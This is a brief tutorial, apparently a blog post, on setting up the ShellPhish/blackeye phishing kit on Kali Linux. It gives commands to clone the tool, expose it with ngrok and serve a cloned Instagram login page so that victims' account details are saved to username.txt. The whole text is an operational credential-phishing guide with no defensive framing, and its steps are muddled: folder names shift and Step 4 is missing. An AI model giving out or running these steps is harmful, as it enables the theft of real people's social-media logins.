Full setup of shellphish on kali linux

                        Full setup of shellphish on kali linux 



            ShellPhish Tool Full Setup 

            GitHub Link: https://github.com/suljot/shellphish

            Step 1: Download ShellPhish tool in Kali Linux through git

                   Open Linux terminal and type 'git clone' and paste github download link. 

            git clone https://github.com/suljot/shellphish


       Step 2: Open blackeye folder.


            shellphish

           ls

            Now Change mode of blackeye.sh to executable.

            chmod +x shellphish.sh


        Step 3: Now run ShellPhish for downloading ngrok  


            ./shellphish.sh


        Step 5: Now open two terminals.


        Step 6: Write this command in first terminal:

            Syntax: ( cd / <folder_location> / blackeye )    

    cd /Desktop/blackeye

    ./ngrok http 8080


Step 7: Write this command in second terminal:

Syntax: ( cd / <folder_location> / blackeye / sites / <site_name> )

    cd /Desktop/blackeye/sites/instagram

    php -S localhost:8080

            
Step 8: Now At the first terminal link is ready.

Step 9: Tool will save the account information to this path:

                /Desktop/blackeye/sites/instagram/username.txt



Video version here 

https://www.youtube.com/watch?v=vSStW255Bxc








Comments